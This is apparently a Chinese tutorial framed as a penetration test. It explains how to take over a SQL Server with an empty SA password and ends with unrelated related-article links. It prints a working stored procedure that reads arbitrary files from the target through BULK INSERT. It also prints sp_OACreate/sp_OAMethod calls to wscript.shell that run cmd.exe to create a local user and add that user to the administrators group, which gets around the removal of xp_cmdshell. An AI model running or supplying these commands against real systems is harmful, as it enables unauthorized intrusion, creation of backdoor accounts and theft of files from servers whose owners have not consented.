利用存儲(chǔ)過(guò)程控制SA口令為空的SQLServer服務(wù)器的方法

前幾天朋友找我，讓我?guī)兔�測(cè)試一下他們的服務(wù)器，經(jīng)過(guò)掃描后發(fā)現(xiàn)SQLServer的SA為空，決定利用這個(gè)漏洞做滲透測(cè)試。經(jīng)過(guò)測(cè)試發(fā)現(xiàn)存儲(chǔ)過(guò)程 Xp_cmdshell以及讀取注冊(cè)表系列的存儲(chǔ)過(guò)程都被刪除了，并且Xplog70.dll也被刪除，所以無(wú)法執(zhí)行CMD命令和克隆管理員帳號(hào)了，看樣子是經(jīng)過(guò)安全配置的，這種情況據(jù)我當(dāng)時(shí)掌握的知識(shí)是沒(méi)辦法入侵的。以前也遇到過(guò)類似的機(jī)器，所以決定利用幾天的時(shí)間解決這個(gè)問(wèn)題。

經(jīng)過(guò)兩天的查閱資料和測(cè)試，實(shí)現(xiàn)了不需要使用任何SQLServer自帶的存儲(chǔ)過(guò)程就可以從目標(biāo)機(jī)上得到txt、asp等類型文件的內(nèi)容(前提是知道SA 密碼或者SA密碼為空)，實(shí)現(xiàn)過(guò)程就是自己建立一個(gè)臨時(shí)表，然后將文件讀到表中，再用SELECT語(yǔ)句得到返回值，即文件的內(nèi)容。我們可以在查詢分析器里先寫(xiě)入一個(gè)存儲(chǔ)過(guò)程，然后執(zhí)行，在需要的時(shí)候只要調(diào)用該存儲(chǔ)過(guò)程即可：

Create proc sp_readTextFile @filename sysname
as

  begin
  set nocount on
  Create table #tempfile (line varchar(8000))
  exec ('bulk insert #tempfile from "' + @filename + '"')
  select * from #tempfile
  drop table #tempfile
End
go


這樣我們只要執(zhí)行類似下面的語(yǔ)句就可以得到指定路徑下文件的內(nèi)容：

exec sp_readTextFile 'c:\aaa.asp'



實(shí)現(xiàn)這個(gè)功能后，本打算通過(guò)讀取朋友服務(wù)器上網(wǎng)站的asp代碼，做進(jìn)一步的入侵，可是后來(lái)發(fā)現(xiàn)，因?yàn)椴恢�道網(wǎng)站asp文件的絕對(duì)路徑，所以這個(gè)功能根本用不上，只好作罷，另找其他方法。在這之后的幾天時(shí)間里，我想到了使用安全文章經(jīng)常提到OLE相關(guān)的一系列存儲(chǔ)過(guò)程，這一系列的存儲(chǔ)過(guò)程同 Xp_cmdshell以及讀取注冊(cè)表系列的存儲(chǔ)過(guò)程一樣危險(xiǎn)，但是其使用方法不象那些存儲(chǔ)過(guò)程在網(wǎng)絡(luò)上和書(shū)上介紹的那樣多，這系列的存儲(chǔ)過(guò)程有 sp_OACreate，sp_OADestroy，sp_OAGetErrorInfo，sp_OAGetProperty，sp_OAMethod， sp_OASetProperty，sp_OAStop，下面我講一下通過(guò)查閱資料得到的使用方法：

打開(kāi)查詢分析器，然后使用SA與目標(biāo)機(jī)連接上，在查詢分析器里執(zhí)行：


DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user
ceshi 1 /add'--


這樣對(duì)方系統(tǒng)增加了一個(gè)用戶名為ceshi，密碼為1的用戶，再執(zhí)行：

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net localgroup
administrators ceshi /add '--



用戶ceshi，被加入管理員組。

總結(jié)：通過(guò)這次滲透測(cè)試，又學(xué)到了一種利用存儲(chǔ)過(guò)程控制SA為空的SQLServer服務(wù)器的方法。

【利用存儲(chǔ)過(guò)程控制SA口令為空的SQLServer服務(wù)器的方法】相關(guān)文章：

以過(guò)程為話題的作文08-17

以過(guò)程為話題的作文11-07

過(guò)程裝備與控制工程就業(yè)前景07-20

利用口令法提高學(xué)生隊(duì)列訓(xùn)練的興趣08-21

基于伯努利大數(shù)定律的云存儲(chǔ)數(shù)據(jù)方法研究08-18

以享受過(guò)程為話題作文02-25

以過(guò)程為話題的作文2篇12-24

控制槍支的方法 The Way to Control Gun05-11

過(guò)程裝備與控制工程專業(yè)學(xué)生求職信05-28

利用PXE批量克隆機(jī)器的一些方法08-18